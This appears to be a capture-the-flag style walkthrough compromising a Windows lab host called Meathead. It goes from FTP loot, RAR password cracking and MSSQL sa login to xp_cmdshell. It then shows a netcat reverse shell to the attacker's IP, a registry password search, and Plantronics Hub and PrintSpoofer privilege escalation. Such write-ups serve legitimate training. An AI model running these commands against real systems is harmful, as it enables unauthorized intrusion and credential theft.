Overview

Enumeration

Terminal window
$ sudo nmap $ip -p80,135,139,445,1435,3389 -sVC -O
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Plantronics
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1435/tcp open ibm-cics?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2021-09-20T18:20:56
|_Not valid after: 2022-03-22T18:20:56
|_ssl-date: 2021-11-21T03:57:08+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
| Product_Version: 10.0.17763
|_ System_Time: 2021-11-21T03:56:28+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Additional scans

Terminal window
$ nmap $ip -p1221,1435,5895 -sVC --version-all
PORT STATE SERVICE VERSION
1221/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20 07:02PM 18866 Elementum Supremum.docx
| 04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
| 04-27-20 07:02PM 15690 img.jpg
| 04-27-20 07:02PM 302 MSSQL_BAK.rar
| 04-27-20 07:02PM 548 palindromes.txt
|_04-27-20 07:02PM 45369 server.jpg
| ftp-syst:
|_ SYST: Windows_NT
1435/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
| ms-sql-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
|_ Product_Version: 10.0.17763
|_ssl-date: 2021-11-21T04:32:52+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-21T18:21:07
|_Not valid after: 2051-09-21T18:21:07
5895/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Initial Access

Download MSSQL_BAK.rar from the anonymous FTP share. The archive is password-protected; extract its hash with rar2john (saved here as ./john.txt) and crack it with john:

Terminal window
$ john --wordlist=/usr/share/wordlists/rockyou.txt ./john.txt
<...>
letmeinplease (mssql_bak.rar)

Extract the archive with the recovered password to reveal the MSSQL credentials:

Terminal window
$ unrar x mssql_bak.rar
UNRAR 6.02 freeware Copyright (c) 1993-2021 Alexander Roshal
Enter password (will not be echoed) for mssql_bak.rar:
Extracting from mssql_bak.rar
Extracting mssql_backup.txt OK
All OK
$ cat mssql_backup.txt
Username: sa
Password: EjectFrailtyThorn425

XP_CMDSHELL Code Execution

Terminal window
$ mssqlclient.py sa:EjectFrailtyThorn425@192.168.155.70 -port 1435
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL
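The enable_xp_cmdshell macro in mssqlclient.py hides the actual T-SQL. The block below is an added example, not part of the original writeup: it shows the sp_configure sequence the macro wraps, the checks worth running around it (does the login really have sysadmin, is the option already on, what does the service account's token look like), and how to turn the option back off. It assumes a sysadmin login such as the recovered sa account.

```sql
-- Added example (not from the original writeup): the T-SQL behind the
-- mssqlclient.py "enable_xp_cmdshell" macro, with pre/post checks.
-- Assumes a sysadmin login such as the recovered "sa".

-- 1. Does this login actually have sysadmin? xp_cmdshell needs it
--    (or a proxy account set up via sp_xp_cmdshell_proxy_account).
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1 = yes

-- 2. Current state of the options (value_in_use: 0 = off, 1 = on).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. Enable it. Each option needs RECONFIGURE before it takes effect;
--    "changed from 1 to 1" in the shell output means the host already
--    had it enabled.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Commands run as the SQL Server service account, not as "sa".
--    Each output line comes back as a row, terminated by a NULL row.
--    "whoami /priv" is the check that decides the later escalation path:
--    SeImpersonatePrivilege on the service account is what PrintSpoofer needs.
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'whoami /priv';

-- 5. Cleanup (and the defensive setting): disable it again and verify.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
```

On a hardened instance the sysadmin check in step 1 fails for application logins, and xp_cmdshell stays at value_in_use = 0; the recovered sa password is what makes every later step on this box possible.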

Reverse Shell

Serve nc64.exe from an SMB share on the attacking host (192.168.49.155) and launch it through xp_cmdshell by UNC path, with a listener waiting on port 80:

SQL> xp_cmdshell \\192.168.49.155\share\nc64.exe -e cmd.exe 192.168.49.155 80

Credential Disclosure

Search the registry for string values whose name contains "pass":

SQL> xp_cmdshell reg query HKLM /f pass /t REG_SZ /s
< . . . SNIP . . . >
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control
CurrentPass REG_SZ TwilightAirmailMuck234
< . . . SNIP . . . >

RDP into the machine as jane with the recovered password:

Terminal window
$ rdesktop -u jane -p "TwilightAirmailMuck234" $ip

Privilege Escalation

Plantronics Hub 3.13.2 - Privilege Escalation

The Plantronics Hub 3.13.2 local privilege escalation works by dropping a user|advertise|executable line that the Hub's SYSTEM-level update service picks up and executes; for this box the line starts cmd.exe:

Terminal window
jane|advertise|C:\Windows\System32\cmd.exe

SeImpersonatePrivilege | PrintSpoofer

The xp_cmdshell shell runs as the SQL Server service account (nt service\mssql$sqlexpress), which holds SeImpersonatePrivilege; PrintSpoofer abuses that privilege to spawn a SYSTEM shell:

Terminal window
C:\FTP>PrintSpoofer64.exe -i -c cmd
C:\Windows\system32>whoami
whoami
nt authority\system